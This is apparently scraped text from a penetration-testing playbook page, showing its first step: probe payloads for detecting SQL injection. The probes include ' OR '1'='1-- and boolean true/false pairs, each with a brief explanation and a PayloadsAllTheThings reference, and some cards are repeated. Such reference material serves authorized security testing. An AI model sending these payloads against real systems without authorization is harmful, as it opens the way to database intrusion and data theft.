Single quote probe
Entry point detection
'--
Trigger SQL syntax errors to confirm injection.
PayloadsAllTheThings referenceStep-by-step injection playbook — authorized testing only
Step 1 — Detection
Start with a syntax break, then boolean pairs. One signal is enough to move on.
If this fails
Entry point detection
'--
Trigger SQL syntax errors to confirm injection.
PayloadsAllTheThings referenceEntry point detection
' OR '1'='1--
Classic always-true condition (string context).
PayloadsAllTheThings referenceEntry point detection
' AND '1'='2--
Compare response with true condition.
PayloadsAllTheThings referenceEntry point detection
' OR 1=1--
For numeric parameters: ?id=1 OR 1=1
PayloadsAllTheThings referenceEntry point detection
' AND 1=2--
For numeric parameters: ?id=1 AND 1=2
PayloadsAllTheThings referenceEntry point detection
'+'--
MySQL string concatenation via + operator.
PayloadsAllTheThings referenceEntry point detection
'||'--
Alternative merge / OR bypass.
PayloadsAllTheThings reference